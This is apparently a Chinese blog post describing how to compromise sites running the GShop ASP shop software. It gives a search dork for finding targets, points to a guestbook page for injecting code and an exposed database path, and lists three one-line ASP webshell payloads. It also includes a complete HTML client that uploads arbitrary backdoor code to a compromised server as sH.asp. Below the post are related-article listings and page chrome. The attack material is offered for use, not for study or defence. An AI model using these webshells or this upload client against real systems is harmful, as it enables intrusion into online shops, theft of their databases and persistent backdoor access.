GShop小小漏洞

最新推荐文章于 2025-08-28 10:23:40 发布
原创 最新推荐文章于 2025-08-28 10:23:40 发布 · 808 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#asp #input #border #session #数据库 #class

GShop小小漏洞

 

搜索:
http://www.google.cn/search?q=%22Powered+By+GShop%22&hl=zh-CN&rlz=1T4GGLL_zh-CNCN318CN318&newwindow=1&start=0&sa=N

提交一句话木马:
http://www.xxx.com/guestbook.asp


数据库地址:
http://www.xxx.com/db/YZ_Consume.asp

 

 

 

提供三个服务端:
1. <%eval request("si")%>
2. <%execute request("si")%>
3. <%execute(request("si"))%>
把红色的si换成您的密码,解决了原一句话ASP木马的错误,只要用"eval"替换掉"execute"服务端,就不会出错了!

 

 

 

 

<html>
<head>
<title>一句话ASP木马完美版</title>
<style type="text/css">
<!--
body {
        background-color: #ffffff;
       
}
.bad {
        border: 1px solid #000000;
        font-size: 12px;
}
-->
</style>
</head>
<body bgcolor="#FFFFFF" link="#FFFFFF" vlink="#FFFF00" alink="#FFFFFF">
<center>
<div style="width: 350; line-height: 35pt; font-size:16pt; font-family:Comic Sans MS; color: #ffffff; position: relative;
filter:glow(color=#336699, strength=15)"><b>一句话ASP木马完美版</b></div>
<table width="627" border="0" align="center" class="bad" height="14" cellspacing="0">
<tr>
<td height="1" width="794">
<form method="post" name="pass">
<font color="#000000">服务端网址:</font><input name="act" type="text" id="act" size="84" value="http://"> <input type="submit" value="提交" onClick="this.form.cnnsc.name=this.form.password.value;this.form.action=this.form.act.value;">
<br>
登陆密码:<input name="password" type="text" id="password" value="" size="93">
<input type="hidden" name="cnnsc" id="cnnsc" value="Execute(&quot;Session(&quot;&quot;cnnsc&quot;&quot;)=request(&quot;&quot;*&quot;&quot;):Execute(Session(&quot;&quot;cnnsc&quot;&quot;))&quot;)">
</td>
</tr>
<tr>
<td height="100" width="794">
<textarea name="*" cols="100" rows="9" width="45">
set lP=server.createObject("Adodb.Stream")
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request("pass")
lP.SaveToFile server.mappath("sH.asp"),2
lP.Close
set lP=nothing
response.redirect "sH.asp"</textarea>
</td>
</tr>
<tr>
<td height="1" width="794">
<textarea name="pass" cols="100" rows="15" width="45">
这里输入您的ASP后门代码</textarea>
</td>
</tr>
<tr>
<td width="794" height="7">

<font color="#000000">提供三个服务端:</font>
<br>
1. &lt;%eval request(&quot;<font color="red">si</font>&quot;)%&gt;
<br>
2. &lt;%execute request(&quot;<font color="red">si</font>&quot;)%&gt;
<br>
3. &lt;%execute(request(&quot;<font color="red">si</font>&quot;))%&gt;
<br>
把红色的<font color="red">si</font>换成您的密码,解决了原一句话ASP木马的错误,只要用"<font color="red">eval</font>"替换掉"<font color="red">execute</font>"服务端,就不会出错了!<br>
</td>
</tr>
</table>
</body>
</html>

GShop网上商店系统v2.0Build081220
08-01
功能菜单1.商品管理a.商品目录 b.商品管理 c.促销商品 2.订单管理 3.报表统计 4.会员管理 a.会员管理 b.会员来源 c.会员分类 d.业务员管理 e.会员积分 f.会员充值 g.礼品数据 5.网站管理 a.信息管理 b.友情链接 c.网站留言 d.网站参数 e.配送管理6.系统管理 a.用户管理 b.支付管理 c.数据清理7.修改密码  8.退出系统 后台访问方式为admin/i
GShop网上商店系统 2.0.rar
05-25
GShop网上商店系统是一款免费并且开源的个人网上商店系统,可以迅速地建立强大的网上商店。 我们根据客户具体的情况会收取相应的技术支持费或定制修改费。 主要功能: 网上会员注册,商品查询 网上在线提交订单 后台订单管理 后台订单统计 后台商品管理 后台支付与配送管理 后台系统管理 后台管理:admin/index.asp 用户名8001  密码111111
gshop-server-final
06-21
尚硅谷外卖视频的server后台代码,使用node开发的,数据库使用的是mongodb。在尚硅谷最新的视频分享中是没有这个服务端的代码的,所以这里我分享一下,供大家使用。
探秘171208_gshop:一个高效电商解决方案
gitblog_00091的博客
04-21 427
探秘171208_gshop:一个高效电商解决方案 项目简介 是一款基于Python和Django框架开发的电子商务平台。这个项目旨在提供一个强大、易扩展且易于维护的在线购物系统,为小型企业或个人创业者搭建自己的电商平台提供了便利。 技术分析 前端技术栈 HTML5/CSS3:构建现代网页布局和样式。 Bootstrap:快速响应式设计,确保在不同设备上的良好显示效果。 JavaScript/j...
gshop-client-final
06-21
《尚硅谷外卖》视频的client完整代码,使用vue开发的。在尚硅谷最新的视频分享中是没有这个客户端的代码,所以这里我分享一下,供大家使用。
c#版gshop
weixin_34198881的博客
09-12 99
using System;using System.Collections.Generic;using System.ComponentModel;using System.Data;using System.Drawing;using System.Text;using System.Windows.Forms;using System.Runtime.InteropServices;using...
gshop.data 编辑器通杀版本 支持146-151版本
weixin_30872867的博客
03-02 936
EXE下载:http://files.cnblogs.com/xe2011/EXEgshop.dataeditorV1.42014-3-11-204242.7z C#:http://files.cnblogs.com/xe2011/script_gshop.dataeditorV1.42014-3-11-204242.7z 本程序 是C#写的,系统必须安装了.net framework ...
湖南芒果代理php,芒果商城系统GSHOP php网店系统 UTF8
weixin_33272141的博客
04-15 177
芒果系统GSHOP 纯静态商城系统,你还在为商城的优化而苦恼?GSHOP是全站纯静态商城系统,一键seo优化功能处理seo问题,自己设置URL链接处理商城同质化问题;多页面显示:动态页、伪静态页面、纯静态页面添加收录,提升网站权重,提升流量等。安全稳固、功能强大的商城系统。1、芒果商城系统基于 php5.0开发,企业级应用。2、产品功能Ajax设计,响应速度更快,购物体验更好3、全新密钥存放机制,...
com.timjcshop.www.bll.dll com.yeepay.dll com.gshop.www.tools.dll com.gshop.www.model.dll com.gsh
最新发布
amio551的博客
08-28 278
以上只是通用的运行库dll处理方式,如果你遇到缺失文件是第三方的软件文件,那么就需要下载到属于这个程序所匹配的版本的文件,然后将这个文件复制到这个程序的安装目录下才能解决问题。如果我们遇到关于文件在系统使用过程中提示缺少找不到的情况,如果文件是属于运行库文件的可以单独下载文件解决,但还是建议安装完整的运行库,可以尝试采用手动下载替换的方法解决问题!文件下载完成后,下方列表会有很多个不同版本的文件,这里所有文件都是免费可下载的,我们根据自己所需要的版本文件,点击右边的“打开”,这样就找到了下载的文件。
精选资源
诛仙422端可以用的Gshop编辑器
11-14
《诛仙422端Gshop编辑器详解与应用指南》 在网络游戏世界中,"诛仙"是一款深受玩家喜爱的角色扮演游戏,而“Gshop编辑器”则为这款游戏的个性化和自定义提供了强大的工具。本篇文章将深入探讨“诛仙422端”下Gshop...
GShop网上商店系统 v2.0
11-27
功能菜单 1.商品管理 a.商品目录b.商品管理c.促销商品 2.订单管理 3.报表统计 4.会员管理a.会员管理b.会员来源c.会员分类d.业务员管理e.会员积分f.会员充值g.... 软件类别:电子商务 运行环境:ASP环境/ 授权方式:免费版
蜜蜂gshopv2.01适合所有版本
02-26
蜜蜂gshopv2.01适合所有版本
gshop.rar
08-24
"gshop.rar"这个压缩包文件的标题暗示它包含了与前端开发相关的项目和资料。前端开发是构建互联网应用和网站的重要部分,主要负责用户在浏览器中看到和交互的部分。在这个领域,开发者通常会使用HTML、CSS和...
SimpleXMLEditor 2.01版本发布
java专栏
05-23 269
google_ad_client = "pub-8800625213955058";/* 336x280, 创建于 07-11-21 */google_ad_slot = "0989131976";google_ad_width = 336;google_ad_height = 280;//<script type="text/java
Elements.data gshop.data 编辑器
01-01
完美 Elements.data 及 gshop.data文件编辑工具。 by Kuqoi
诛仙422端兼容Gshop编辑器版本发布
资源摘要信息: "诛仙422端可以用的Gshop编辑器" 诛仙游戏是一款在中国大陆非常受欢迎的多人在线角色扮演游戏(MMORPG),它的游戏版本众多,伴随着玩家对游戏体验的不断追求,各种游戏辅助工具和编辑器应运而生。...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值